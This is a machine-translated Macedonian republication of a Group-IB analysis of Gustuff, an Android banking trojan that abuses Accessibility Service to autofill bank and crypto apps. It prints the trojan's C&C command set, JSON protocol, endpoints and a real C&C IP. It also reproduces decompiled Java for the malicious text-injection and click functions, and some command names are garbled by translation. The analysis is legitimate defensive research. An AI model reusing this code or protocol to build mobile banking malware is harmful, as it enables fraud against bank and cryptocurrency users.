🥇Како Android Trojan Gustuff го брише кремот (фиат и крипто) од вашите сметки

Само пред некој ден Group-IB пријавени за активноста на мобилниот Android Trojan Gustuff. Работи исклучиво на меѓународни пазари, напаѓајќи клиенти на 100-те најголеми странски банки, корисници на мобилни 32 криптопаричници, како и големи ресурси за е-трговија. Но, развивачот на Gustuff е сајбер криминалец кој зборува руски под прекарот Bestoffer. До неодамна, тој го фалеше својот Тројанец како „сериозен производ за луѓе со знаење и искуство“.

Специјалист за анализа на злонамерен код во Group-IB Иван Писарев во своето истражување тој детално зборува за тоа како функционира Гастуф и кои се неговите опасности.

За кого лови Гастуф?

Gustuff припаѓа на новата генерација на малициозен софтвер со целосно автоматизирани функции. Според инвеститорот, тројанецот стана нова и подобрена верзија на малициозниот софтвер AndyBot, кој од ноември 2017 година напаѓа телефони со Android и краде пари преку фишинг веб-форми кои се маскирани како мобилни апликации на познати меѓународни банки и платежни системи. Bestoffer објави дека цената за изнајмување на Gustuff Bot била 800 долари месечно.

Анализата на примерокот Гастуф покажа дека тројанецот потенцијално ги таргетира клиентите кои користат мобилни апликации на најголемите банки, како што се Bank of America, Bank of Scotland, J.P. Morgan, Wells Fargo, Capital One, TD Bank, PNC Bank, како и Bitcoin Криптопаричници за паричник. BitPay, Cryptopay, Coinbase итн.

Првично создаден како класичен банкарски тројанец, во неговата сегашна верзија Gustuff значително ја прошири листата на потенцијални цели за напад. Покрај апликациите за Android за банки, финтех компании и крипто услуги, Gustuff е наменет за корисници на апликации на пазарот, онлајн продавници, платежни системи и инстант-месинџери. Особено, PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut и други.

Влезна точка: пресметка за масовна инфекција

Густуф се карактеризира со „класичниот“ вектор на пенетрација во паметните телефони со Android преку СМС пораки со линкови до АПК. Кога уред со Android е заразен со тројанец по команда на серверот, Гастуф може дополнително да се шири преку базата на контакти на заразениот телефон или преку базата на податоци на серверот. Функционалноста на Гастуф е дизајнирана за масовна инфекција и максимална капитализација на бизнисот на неговите оператори - тој има уникатна функција за „автоматско полнење“ во легитимни апликации за мобилно банкарство и криптопаричници, што ви овозможува да ја забрзате и размерите кражбата на пари.

Студијата за тројанецот покажа дека функцијата за автоматско пополнување е имплементирана во него користејќи ја услугата за пристапност, услуга за лица со посебни потреби. Gustuff не е првиот тројанец кој успешно ја заобиколува заштитата од интеракција со елементите на прозорецот на другите апликации што ја користат оваа услуга на Android. Сепак, употребата на Услугата за пристапност во комбинација со полнење автомобил сè уште е доста ретка.

По преземањето на телефонот на жртвата, Гастуф, користејќи ја услугата за пристапност, може да комуницира со елементи на прозорецот на други апликации (банкарство, криптовалути, како и апликации за онлајн купување, пораки итн.), извршувајќи ги дејствата неопходни за напаѓачите . На пример, по команда на серверот, тројанец може да притисне копчиња и да ги менува вредностите на текстуалните полиња во банкарските апликации. Користењето на механизмот за Услуга за пристапност му овозможува на тројанецот да ги заобиколи безбедносните механизми што ги користат банките за да се спротивстават на мобилните тројанци од претходната генерација, како и промените во безбедносната политика имплементирана од Google во новите верзии на оперативниот систем Android. Така, Гастуф „знае како“ да ја оневозможи заштитата на Google Protect: според авторот, оваа функција работи во 70% од случаите.

Gustuff може да прикажува и лажни PUSH известувања со икони на легитимни мобилни апликации. Корисникот кликнува на известувањето PUSH и гледа прозорец за фишинг преземен од серверот, каде што ги внесува бараните податоци од банкарска картичка или криптопаричник. Во друго сценарио на Gustuff, се отвора апликацијата во име на која беше прикажано известувањето PUSH. Во овој случај, малициозниот софтвер, по наредба од серверот преку Услугата за пристапност, може да ги пополни полињата за формулари на банкарска апликација за лажна трансакција.

Функционалноста на Gustuff вклучува и испраќање информации за инфициран уред до серверот, можност за читање/испраќање СМС пораки, испраќање USSD барања, стартување на SOCKS5 Proxy, следење врска, испраќање датотеки (вклучувајќи фото скенирање на документи, слики од екранот, фотографии) до сервер , ресетирајте го уредот на фабрички поставки.

Анализа на малициозен софтвер

Пред да инсталирате злонамерна апликација, оперативниот систем Android на корисникот му покажува прозорец кој содржи листа на права што ги бара Гастуф:

Апликацијата ќе се инсталира само откако ќе добие согласност од корисникот. По стартувањето на апликацијата, тројанецот ќе му покаже на корисникот прозорец:

После тоа, ќе ја отстрани иконата.

Gustuff е спакуван, според авторот, од пакувач од FTT. По стартувањето, апликацијата периодично контактира со CnC серверот за да прима команди. Неколку датотеки што ги испитавме користеа IP адреса како контролен сервер 88.99.171[.]105 (во натамошниот текст ќе го означуваме како ).

По стартувањето, програмата започнува да испраќа пораки до серверот http://<%CnC%>/api/v1/get.php.

Одговорот се очекува да биде JSON во следниов формат:

{
    "results" : "OK",
    "command":{
        "id": "<%id%>",
        "command":"<%command%>",
        "timestamp":"<%Server Timestamp%>",
        "params":{
		<%Command parameters as JSON%>
        },
    },
}

Секој пат кога ќе се пристапи до апликацијата, таа испраќа информации за заразениот уред. Форматот на пораката е прикажан подолу. Вреди да се напомене дека полињата Целосна, дополнителни, апликации и дозвола – опционално и ќе биде испратено само во случај на барање команда од CnC.

{
    "info":
    {
        "info":
        {
            "cell":<%Sim operator name%>,
            "country":<%Country ISO%>,
            "imei":<%IMEI%>,
            "number":<%Phone number%>,
            "line1Number":<%Phone number%>,
            "advertisementId":<%ID%>
        },
        "state":
        {
            "admin":<%Has admin rights%>,
            "source":<%String%>,
            "needPermissions":<%Application needs permissions%>,
            "accesByName":<%Boolean%>,
            "accesByService":<%Boolean%>,
            "safetyNet":<%String%>,
            "defaultSmsApp":<%Default Sms Application%>,
            "isDefaultSmsApp":<%Current application is Default Sms Application%>,
            "dateTime":<%Current date time%>,
            "batteryLevel":<%Battery level%>
        },
        "socks":
        {
            "id":<%Proxy module ID%>,
            "enabled":<%Is enabled%>,
            "active":<%Is active%>
        },
        "version":
        {
            "versionName":<%Package Version Name%>,
            "versionCode":<%Package Version Code%>,
            "lastUpdateTime":<%Package Last Update Time%>,
            "tag":<%Tag, default value: "TAG"%>,
            "targetSdkVersion":<%Target Sdk Version%>,
            "buildConfigTimestamp":1541309066721
        },
    },
    "full":
    {
        "model":<%Device Model%>,
        "localeCountry":<%Country%>,
        "localeLang":<%Locale language%>,
        "accounts":<%JSON array, contains from "name" and "type" of accounts%>,
        "lockType":<%Type of lockscreen password%>
    },
    "extra":
    {
        "serial":<%Build serial number%>,
        "board":<%Build Board%>,
        "brand":<%Build Brand%>,
        "user":<%Build User%>,
        "device":<%Build Device%>,
        "display":<%Build Display%>,
        "id":<%Build ID%>,
        "manufacturer":<%Build manufacturer%>,
        "model":<%Build model%>,
        "product":<%Build product%>,
        "tags":<%Build tags%>,
        "type":<%Build type%>,
        "imei":<%imei%>,
        "imsi":<%imsi%>,
        "line1number":<%phonenumber%>,
        "iccid":<%Sim serial number%>,
        "mcc":<%Mobile country code of operator%>,
        "mnc":<%Mobile network codeof operator%>,
        "cellid":<%GSM-data%>,
        "lac":<%GSM-data%>,
        "androidid":<%Android Id%>,
        "ssid":<%Wi-Fi SSID%>
    },
    "apps":{<%List of installed applications%>},
    "permission":<%List of granted permissions%>
}

Складирање податоци за конфигурација

Gustuff зачувува оперативно важни информации во претпочитана датотека. Името на датотеката, како и имињата на параметрите во него, се резултат на пресметување на збирот MD5 од низата 15413090667214.6.1каде — почетно име-вредност. Пајтонска интерпретација на функцијата за генерирање име:

 nameGenerator(input):
    output = md5("15413090667214.6.1" + input)

Во продолжение ќе го означиме како nameGenerator (влез).
Значи првото име на датотека е: nameGenerator („API_SERVER_LIST“), содржи вредности со следните имиња:

Име на променлива	Вредност
nameGenerator („API_SERVER_LIST“)	Содржи листа на CnC адреси во форма на низа.
nameGenerator („API_SERVER_URL“)	Ја содржи адресата CnC.
nameGenerator („SMS_UPLOAD“)	Знамето е стандардно поставено. Ако знамето е поставено, испраќа СМС пораки до CnC.
nameGenerator („SMS_ROOT_NUMBER“)	Телефонски број на кој ќе се испраќаат СМС пораките добиени од заразениот уред. Стандардно е нула.
nameGenerator („SMS_ROOT_NUMBER_RESEND“)	Знамето е стандардно исчистено. Ако е инсталиран, кога заразениот уред ќе добие SMS порака, тој ќе биде испратен до коренскиот број.
nameGenerator („DEFAULT_APP_SMS“)	Знамето е стандардно исчистено. Ако е поставено ова знаменце, апликацијата ќе ги обработува дојдовните СМС пораки.
nameGenerator („DEFAULT_ADMIN“)	Знамето е стандардно исчистено. Ако знамето е поставено, апликацијата има администраторски права.
nameGenerator („DEFAULT_ACCESSIBILITY“)	Знамето е стандардно исчистено. Ако знамето е поставено, се извршува услуга што ја користи Услугата за пристапност.
nameGenerator („APPS_CONFIG“)	Објект JSON што содржи список на дејства што мора да се извршат кога ќе се активира настан за пристапност поврзан со одредена апликација.
nameGenerator („APPS_INSTALLED“)	Складира список на апликации инсталирани на уредот.
nameGenerator („IS_FIST_RUN“)	Знамето се ресетира на првиот почеток.
nameGenerator („UNIQUE_ID“)	Содржи единствен идентификатор. Се генерира кога ботот се лансира за прв пат.

Модул за обработка на команди од серверот

Апликацијата ги складира адресите на CnC серверите во форма на низа кодирана од База85 линии. Списокот на CnC сервери може да се смени по добивањето на соодветната команда, во тој случај адресите ќе бидат зачувани во преференцијална датотека.

Како одговор на барањето, серверот испраќа команда до апликацијата. Вреди да се напомене дека командите и параметрите се претставени во JSON формат. Апликацијата може да ги обработи следните команди:

Тим	Опис
напред Старт	Започнете да испраќате СМС пораки добиени од заразениот уред до серверот CnC.
напредСтоп	Престанете да испраќате СМС-пораки добиени од заразениот уред до серверот CnC.
ussdRun	Извршете USSD барање. Бројот на кој треба да поднесете барање за USSD се наоѓа во полето JSON „број“.
прати СМС	Испратете една СМС порака (ако е потребно, пораката е „поделена“ на делови). Како параметар, командата зема JSON објект кој ги содржи полињата „to“ - одредишниот број и „body“ - телото на пораката.
sendSmsAb	Испратете СМС пораки (доколку е потребно, пораката е „поделена“ на делови) до сите во списокот со контакти на заразениот уред. Интервалот помеѓу испраќање пораки е 10 секунди. Телото на пораката е во полето JSON „тело“
sendSmsMass	Испратете СМС пораки (доколку е потребно, пораката е „поделена“ на делови) до контактите наведени во командните параметри. Интервалот помеѓу испраќање пораки е 10 секунди. Како параметар, командата зема низа JSON (полето „sms“), чии елементи ги содржат полињата „до“ - бројот на дестинацијата и „телото“ - телото на пораката.
промена на серверот	Оваа команда може да земе вредност со клучот „url“ како параметар - тогаш ботот ќе ја смени вредноста на nameGenerator(„SERVER_URL“) или „низа“ - тогаш ботот ќе ја запише низата во nameGenerator („API_SERVER_LIST“) Така, апликацијата ја менува адресата на CnC серверите.
административен број	Командата е дизајнирана да работи со root број. Командата прифаќа JSON објект со следните параметри: „број“ — сменете го името Генератор („ROOT_NUMBER“) во добиената вредност, „повторно испратете“ — променете го Генераторот име („SMS_ROOT_NUMBER_RESEND“), „sendId“ — испратете до nameGenerator („ROOT_NUMBER“ ) единствен ID.
updateInfo	Испратете информации за заразениот уред на серверот.
избришете податоци	Командата е наменета да ги избрише корисничките податоци. Во зависност од тоа какво име е стартувана апликацијата, или податоците целосно се бришат со рестартирање на уредот (примарен корисник), или се бришат само корисничките податоци (секунреден корисник).
чорапи Старт	Стартувајте го прокси-модулот. Работата на модулот е опишана во посебен дел.
чорапиСтоп	Запрете го прокси-модулот.
openLink	Следете ја врската. Врската се наоѓа во параметарот JSON под копчето „URL“. „android.intent.action.VIEW“ се користи за отворање на врската.
uploadAllSms	Испратете ги сите СМС пораки што ги добива уредот на серверот.
прикачете ги сите фотографии	Испратете слики од заразен уред на URL. URL-то доаѓа како параметар.
uploadFile	Испратете датотека до URL од заразен уред. URL-то доаѓа како параметар.
испратите телефонски броеви	Испратете телефонски броеви од вашата листа со контакти до серверот. Ако вредноста на објектот JSON со копчето „ab“ се прими како параметар, апликацијата добива список со контакти од телефонскиот именик. Ако JSON објект со клучот „sms“ се прими како параметар, апликацијата ја чита листата на контакти од испраќачите на СМС пораки.
промена Архива	Апликацијата ја презема датотеката од адресата што доаѓа како параметар користејќи го копчето „url“. Преземената датотека се зачувува со името „archive.zip“. Апликацијата потоа ќе ја отпакува датотеката, опционално користејќи ја лозинката за архива „b5jXh37gxgHBrZhQ4j3D“. Отпакуваните датотеки се зачувуваат во директориумот [надворешна меморија]/hgps. Во овој директориум, апликацијата складира веб-фалсификати (опишани подолу).
активности	Командата е дизајнирана да работи со Action Service, што е опишано во посебен дел.
тест	Не правејќи ништо.
Превземи	Командата е наменета да преземе датотека од оддалечен сервер и да ја зачува во директориумот „Преземања“. URL-адресата и името на датотеката доаѓаат како параметар, полиња во објектот на параметарот JSON, соодветно: „url“ и „fileName“.
отстрани	Отстранува датотека од директориумот „Преземања“. Името на датотеката доаѓа во параметар JSON со копчето „Име на датотека“. Стандардното име на датотеката е „tmp.apk“.
известување	Прикажи известување со текстови за опис и наслов дефинирани од серверот за управување.

Формат на команди известување:

{
    "results" : "OK",
    "command":{
    "id": <%id%>,
    "command":"notification",
    "timestamp":<%Server Timestamp%>,
    "params":{
        "openApp":<%Open original app or not%>,
        "array":[
                      {"title":<%Title text%>,
                      "desc":<%Description text%>,
                      "app":<%Application name%>}
                   ]
                   },
        },
}

Известувањето генерирано од датотеката под истрага изгледа идентично со известувањата генерирани од апликацијата наведена во полето апликацијата. Ако вредноста на полето отворена апликација — Точно, кога ќе се отвори известување, се активира апликацијата наведена во полето апликацијата. Ако вредноста на полето отворена апликација - Неточно, тогаш:

Се отвора прозорец за фишинг, чија содржина се презема од директориумот /hgps/
Се отвора прозорец за фишинг, чија содржина се презема од серверот ?id=&app=
Се отвора прозорец за фишинг, маскиран како Google Play картичка, со можност за внесување детали за картичката.

Апликацијата го испраќа резултатот од која било команда до set_state.php како JSON објект во следниов формат:

{
    "command":
    {
        "command":<%command%>,
        "id":<%command_id%>,
        "state":<%command_state%>
    }
    "id":<%bot_id%>
}

Actions Service
Списокот на команди што ги обработува апликациите ги вклучува акција. Кога ќе се прими команда, модулот за обработка на команди пристапува до оваа услуга за да ја изврши проширената команда. Услугата прифаќа JSON објект како параметар. Услугата може да ги изврши следните команди:

1. PARAMS_ACTION — кога прима таква команда, услугата прво ја добива од параметарот JSON вредноста на клучот Type, што може да биде како што следува:

ServiceInfo – подкомандата ја добива вредноста по клуч од параметарот JSON вклучува Неважно. Ако знамето е True, апликацијата го поставува знамето FLAG_ISOLATED_PROCESS на услуга што ја користи услугата за пристапност. На овој начин услугата ќе биде лансирана во посебен процес.
корен — примајте и испраќајте до серверот информации за прозорецот што моментално е во фокус. Апликацијата добива информации користејќи ја класата AccessibilityNodeInfo.
admin — побарајте администраторски права.
одложување — суспендирај го ActionsService за бројот на милисекунди наведени во параметарот за копчето „податоци“.
Windows — испратете листа на прозорци видливи за корисникот.
инсталира — инсталирајте ја апликацијата на заразениот уред. Името на архивскиот пакет е во копчето „Име на датотека“. Самата архива се наоѓа во директориумот Преземања.
глобална – подкомандата е наменета за навигација од тековниот прозорец:
- на менито Брзи поставки
- назад
- дома
- до известувања
- до неодамна отворениот прозорец со апликации
започне - стартувајте ја апликацијата. Името на апликацијата доаѓа како параметар по клуч податоци.
звуци — сменете го режимот на звук во тишина.
отклучите — го вклучува позадинското осветлување на екранот и тастатурата до целосна осветленост. Апликацијата го извршува ова дејство користејќи WakeLock, наведувајќи ја низата [Application lable]:INFO како ознака
дозвола Преклопување — функцијата не е имплементирана (одговорот на извршување на командата е {"порака":"Не поддржува"} или {"порака":"ниска SDK"})
гест — функцијата не е имплементирана (одговорот на извршување на командата е {"порака":"Не поддржува"}или {"порака":"Низок API"})
дозволи — оваа команда е неопходна за барање дозволи за апликацијата. Сепак, функцијата за пребарување не е имплементирана, така што командата е бесмислена. Списокот на бараните права доаѓа како низа JSON со клучот „дозволи“. Стандардна листа:
- андроид.дозвола.READ_PHONE_STATE
- android.permission.READ_CONTACTS
- android.permission.CALL_PHONE
- android.permission.RECEIVE_SMS
- android.permission.SEND_SMS
- android.permission.READ_SMS
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
отвори — прикажете прозорец за фишинг. Во зависност од параметарот што доаѓа од серверот, апликацијата може да ги прикаже следните phishing прозорци:
- Прикажи прозорец за фишинг чија содржина е запишана во датотека во директориум /hgps/. Резултатот од интеракцијата на корисникот со прозорецот ќе биде испратен до /records.php
- Прикажи прозорец за фишинг чија содржина е претходно вчитана од адресата ?id=&app=. Резултатот од интеракцијата на корисникот со прозорецот ќе биде испратен до /records.php
- Прикажи прозорец за фишинг маскиран како картичка на Google Play.
интерактивни — командата е дизајнирана да комуницира со елементи на прозорецот на други апликации користејќи AcessibilityService. Во програмата за интеракција е имплементирана посебна услуга. Апликацијата под истрага може да комуницира со Windows:
- Моментално активни. Во овој случај, параметарот содржи id или текст (име) на објектот со кој треба да комуницирате.
- Видливо за корисникот во моментот кога се извршува командата. Апликацијата избира прозорци по id.
Имајќи примено предмети AccessibilityNodeInfo За елементите на прозорецот од интерес, апликацијата, во зависност од параметрите, може да ги изврши следните дејства:
- фокус — поставете го фокусот на објектот.
- кликнете - кликнете на објект.
- actionId — изврши дејство по ID.
- setText — сменете го текстот на објектот. Промената на текстот е можна на два начина: изврши дејство ACTION_SET_TEXT (ако верзијата на Android на заразениот уред е помлада или еднаква на LOLLIPOP), или со поставување низа на таблата со исечоци и вметнување во објект (за постари верзии). Оваа команда може да се користи за промена на податоци во банкарска апликација.

2. PARAMS_ACTIONS - исто како PARAMS_ACTION, пристигнува само JSON низа од команди.

Се чини дека многу луѓе ќе бидат заинтересирани за тоа како изгледа функцијата на интеракција со елементи на прозорецот на друга апликација. Вака се имплементира оваа функционалност во Gustuff:

boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
    int count = action.optInt("repeat", 1);
    Iterator aiListIterator = ((Iterable)aiList).iterator();
    int count = 0;
    while(aiListIterator.hasNext()) {
        Object ani = aiListIterator.next();
        if(1 <= count) {
            int index;
            for(index = 1; true; ++index) {
                if(action.has("focus")) {
                    if(((AccessibilityNodeInfo)ani).performAction(1)) {
                        ++count;
                    }
                }
                else if(action.has("click")) {
                    if(((AccessibilityNodeInfo)ani).performAction(16)) {
                        ++count;
                    }
                }
                else if(action.has("actionId")) {
                    if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
                        ++count;
                    }
                }
                else if(action.has("setText")) {
                    customHeader ch = CustomAccessibilityService.a;
                    Context context = this.getApplicationContext();
                    String text = action.optString("setText");
                    if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
                        ++count;
                    }
                }
                if(index == count) {
                    break;
                }
            }
        }
        ((AccessibilityNodeInfo)ani).recycle();
    }
    res.addPropertyNumber("res", Integer.valueOf(count));
}

Функција за замена на текст:

boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
    boolean result;
    if(Build$VERSION.SDK_INT >= 21) {
        Bundle b = new Bundle();
        b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
        result = ani.performAction(0x200000, b);  // ACTION_SET_TEXT
    }
    else {
        Object clipboard = context.getSystemService("clipboard");
        if(clipboard != null) {
        ((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
        result = ani.performAction(0x8000);  // ACTION_PASTE
        }
        else {
            result = false;
        }
    }
    return result;
}

Така, со правилна конфигурација на контролниот сервер, Гастуф може да пополни текстуални полиња во банкарската апликација и да кликне на копчињата потребни за да се заврши трансакцијата. Тројанецот дури и не треба да се логира во апликацијата - доволно е да испратите команда за прикажување на известување PUSH и потоа да ја отворите претходно инсталираната банкарска апликација. Корисникот сам ќе се автентицира, по што Гастуф ќе може да го наполни автомобилот.

Модул за обработка на СМС пораки

Апликацијата инсталира управувач за настани за заразениот уред да прифаќа СМС пораки. Апликацијата што се проучува може да прима команди од операторот, кои доаѓаат во телото на СМС пораката. Командите доаѓаат во формат:

7!5=

Апликацијата ја бара низата во сите дојдовни СМС пораки 7!5=, кога ќе се открие низа, таа ја декодира низата од Base64 при поместување 4 и ја извршува командата. Командите се слични на оние со CnC. Резултатот од извршувањето се испраќа на истиот број од кој дојде командата. Формат на одговор:

7*5=

По избор, апликацијата може да ги испрати сите примени пораки на Root бројот. За да го направите ова, коренскиот број мора да биде наведен во преферентната датотека и мора да се постави знамето за пренасочување на пораката. СМС порака се испраќа на бројот на напаѓачот во формат:

Исто така, по избор, апликацијата може да испраќа пораки до CnC. СМС пораката се испраќа до серверот во JSON формат:

{
    "id":<%BotID%>,
    "sms":
    {
        "text":<%SMS body%>,
        "number":<%From number%>,
        "date":<%Timestamp%>
    }
}

Ако знамето е поставено nameGenerator („DEFAULT_APP_SMS“) – апликацијата престанува да ја обработува СМС пораката и ја брише листата на дојдовни пораки.

Прокси-модул

Апликацијата што се проучува содржи Backconnect Proxy модул (во натамошниот текст како Proxy модул), кој има посебна класа која вклучува статични полиња со конфигурација. Податоците за конфигурација се зачувуваат во примерокот во јасна форма:

Сите дејства што ги врши прокси-модулот се најавени во датотеките. За да го направите ова, апликацијата во Надворешното складирање создава директориум наречен „логови“ (полето ProxyConfigClass.logsDir во класата за конфигурација), во кој се чуваат датотеките за дневници. Пријавувањето се случува во датотеки со имиња:

главен.txt – работата на класата наречена CommandServer е логирана во оваа датотека. Во следново, внесувањето на низата str во оваа датотека ќе биде означено како mainLog(str).
сесија-.txt — оваа датотека зачувува податоци од дневникот поврзани со одредена сесија на прокси. Во следново, внесувањето на низата str во оваа датотека ќе биде означено како sessionLog (str).
server.txt – оваа датотека се користи за евидентирање на сите податоци запишани во гореопишаните датотеки.

Формат на податоци за евиденција:

[Нима[], id[]]: лог-низа

Исклучоците што се појавуваат за време на работата на модулот Proxy исто така се евидентирани во датотека. За да го направите ова, апликацијата генерира JSON објект во следниов формат:

{
    "uncaughtException":<%short description of throwable%>
    "thread":<%thread%>
    "message":<%detail message of throwable%>
    "trace":        //Stack trace info
        [
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            },
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            }
        ]
}

Потоа го конвертира во претстава на низа и ја евидентира.

Прокси-модулот се стартува по добивањето на соодветната команда. Кога ќе се прими команда за стартување на прокси-модулот, апликацијата започнува услуга наречена MainService, кој е одговорен за управување со работата на Proxy модулот - негово стартување и стопирање.

Фази на започнување на услугата:

1. Започнува тајмер што работи еднаш во минута и ја проверува активноста на прокси-модулот. Ако модулот не е активен, тој го стартува.
Исто така кога настанот е активиран android.net.conn.CONNECTIVITY_CHANGE Модулот Proxy е стартуван.

2. Апликацијата создава wake-lock со параметарот PARTIAL_WAKE_LOCK и го заробува. Ова го спречува процесорот на уредот да премине во режим на мирување.

3. Ја стартува класата за обработка на команди на модулот Proxy, прво регистрирајќи ја линијата mainLog ("старт сервер") и

Сервер::start() домаќин[], commandPort[], proxyPort[]

каде што proxy_cnc, command_port и proxy_port – параметри добиени од конфигурацијата на прокси-серверот.

Се повикува класата за обработка на команди CommandConnection. Веднаш по стартувањето, извршете ги следните дејства:

4. Се поврзува со ProxyConfigClass.host: ProxyConfigClass.commandPort и испраќа податоци за заразениот уред таму во JSON формат:

{
    "id":<%id%>,
    "imei":<%imei%>,
    "imsi":<%imsi%>,
    "model":<%model%>,
    "manufacturer":<%manufacturer%>,
    "androidVersion":<%androidVersion%>,
    "country":<%country%>,
    "partnerId":<%partnerId%>,
    "packageName":<%packageName%>,
    "networkType":<%networkType%>,
    "hasGsmSupport":<%hasGsmSupport%>,
    "simReady":<%simReady%>,
    "simCountry":<%simCountry%>,
    "networkOperator":<%networkOperator%>,
    "simOperator":<%simOperator%>,
    "version":<%version%>
}

Каде што:

id – идентификатор, се обидува да добие вредност со полето „id“ од датотеката Shared Preference со име „x“. Ако оваа вредност не може да се добие, таа генерира нова. Така, прокси-модулот има свој идентификатор, кој се генерира слично на Bot ID.
imei — IMEI на уредот. Ако се појави грешка при процесот на добивање на вредноста, наместо ова поле ќе биде напишана текстуална порака за грешка.
imsi — Меѓународен мобилен претплатнички идентитет на уредот. Ако се појави грешка при процесот на добивање на вредноста, наместо ова поле ќе биде напишана текстуална порака за грешка.
модел - Името за крајниот производ видливо за крајниот корисник.
производител — Производителот на производот/хардверот (изградба.ПРОИЗВОДИТЕЛОТ).
androidVersion - низа во формат „ (),“
земја — моментална локација на уредот.
partnerId е празна низа.
Име на пакет - име на пакет.
networkType — тип на моментална мрежна конекција (на пример: „WIFI“, „MOBILE“). Во случај на грешка, враќа нула.
има GsmSupport – точно – ако телефонот поддржува GSM, инаку неточно.
simReady – состојба на SIM картичката.
simCountry - ISO код на земјата (врз основа на давателот на SIM картичката).
networkOperator — име на оператор. Ако се појави грешка при процесот на добивање на вредноста, наместо ова поле ќе биде напишана текстуална порака за грешка.
simOperator - Име на давател на услуги (SPN). Ако се појави грешка при процесот на добивање на вредноста, наместо ова поле ќе биде напишана текстуална порака за грешка.
верзија - ова поле е зачувано во класата за конфигурација; за тестираните верзии на ботот беше еднакво на „1.6“.

5. Се префрла на режимот на чекање команди од серверот. Наредбите од серверот доаѓаат во формат:

0 поместување – команда
1 поместување – СесијаId
2 поместување – должина
4 поместување - податоци

Кога ќе пристигне команда, апликацијата се логира:
mainLog("Header { sessionId], тип[], должина[] }")

Следниве команди од серверот се можни:

Име	Команда	податоци	Опис
идентификација на врската	0	ID за поврзување	Направете нова врска
СВЕТЕ	3	време	Паузирајте го прокси-модулот
ПИНГ ПОНГ	4	-	Испрати порака PONG

Пораката PONG се состои од 4 бајти и изгледа вака: 0x04000000.

Кога ќе се прими командата connectionId (за да се создаде нова врска) CommandConnection создава пример од класа ProxyConnection.

Две класи учествуваат во прокси: ProxyConnection и крајот. При креирање на класа ProxyConnection поврзување со адресата ProxyConfigClass.host: ProxyConfigClass.proxyPort и пренесување на објектот JSON:

 {
    "id":<%connectionId%>
}

Како одговор, серверот испраќа порака SOCKS5 која ја содржи адресата на оддалечениот сервер со кој врската мора да се воспостави. Интеракцијата со овој сервер се јавува преку класата крајот. Поставувањето на врската може шематски да се претстави на следниов начин:

Мрежни интеракции

За да се спречи анализа на сообраќајот од страна на мрежните трагачи, интеракцијата помеѓу CnC серверот и апликацијата може да се заштити со помош на SSL протоколот. Сите пренесени податоци и од и до серверот се претставени во JSON формат. Апликацијата ги извршува следниве барања за време на работата:

http://<%CnC%>/api/v1/set_state.php - резултатот од извршувањето на командата.
http://<%CnC%>/api/v1/get.php — примање команда.
http://<%CnC%>/api/v1/load_sms.php — преземање СМС пораки од заразен уред.
http://<%CnC%>/api/v1/load_ab.php — поставување листа на контакти од заразен уред.
http://<%CnC%>/api/v1/aevents.php – барањето се прави при ажурирање на параметрите лоцирани во преферентната датотека.
http://<%CnC%>/api/v1/set_card.php — прикачување податоци добиени со помош на прозорец за фишинг што се маскира како Google Play Market.
http://<%CnC%>/api/v1/logs.php – поставување податоци од дневникот.
http://<%CnC%>/api/v1/records.php – прикачување податоци добиени преку фишинг прозорци.
http://<%CnC%>/api/v1/set_error.php – известување за настаната грешка.

Препораки

Со цел да ги заштитат своите клиенти од заканата на мобилните тројанци, компаниите мора да користат сеопфатни решенија кои ќе им овозможат да ги следат и спречат злонамерните активности без да инсталираат дополнителен софтвер на корисничките уреди.

За да го направите ова, методите за потпис за откривање на мобилни тројанци треба да се зајакнат со технологии за анализа на однесувањето и на клиентот и на самата апликација. Заштитата треба да вклучува и функција за идентификација на уредот со помош на технологија за дигитален отпечаток од прст, што ќе овозможи да се разбере кога сметката се користи од нетипичен уред и веќе паднала во рацете на измамник.

Фундаментално важна точка е достапноста на меѓуканална анализа, која им овозможува на компаниите да ги контролираат ризиците што произлегуваат не само на Интернет, туку и на мобилниот канал, на пример, во апликациите за мобилно банкарство, за трансакции со криптовалути и кои било други каде може да се вршат трансакции.финансиска трансакција.

Правила за безбедност за корисниците:

не инсталирајте апликации за мобилен уред со Android OS од други извори освен Google Play, обрнете посебно внимание на правата што ги бара апликацијата;
редовно инсталирајте ажурирања на Android OS;
обрнете внимание на екстензии на преземените датотеки;
не посетувајте сомнителни ресурси;
Не кликајте на линковите примени во СМС пораките.

Во главната улога Семјон Рогачева, помлад специјалист за истражување на малициозен софтвер во Лабораторијата за компјутерска форензика Group-IB.

Извор: www.habr.com

Како Android Trojan Gustuff го брише кремот (фиат и крипто) од вашите сметки